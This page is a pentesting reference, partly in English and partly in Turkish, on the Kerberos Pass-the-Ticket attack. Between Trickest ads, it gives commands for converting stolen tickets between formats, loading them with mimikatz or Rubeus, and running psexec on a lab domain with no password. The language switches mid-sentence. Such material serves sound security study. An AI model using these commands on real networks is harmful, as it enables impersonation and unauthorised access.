Pass the Ticket

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Pass The Ticket (PTT)

In the Pass The Ticket (PTT) attack method, attackers bir kullanıcının kimlik doğrulama biletini çalar yerine şifresini veya hash değerlerini. Bu çalınan bilet daha sonra kullanıcıyı taklit etmek için kullanılır ve bir ağ içindeki kaynaklara ve hizmetlere yetkisiz erişim sağlar.

Read:

• Windows'tan bilet toplama

• Linux'tan bilet toplama

Platformlar arasında Linux ve Windows biletlerini değiştirme

The ticket_converter tool converts ticket formats using just the ticket itself and an output file.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Windows'da Kekeo kullanılabilir.

Pass The Ticket Saldırısı

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Referanslar

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

Dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturmak ve otomatikleştirmek için Trickest kullanın. Bugün Erişim Alın:

Automate OffSec, EASM, and Custom Security Processes | Trickest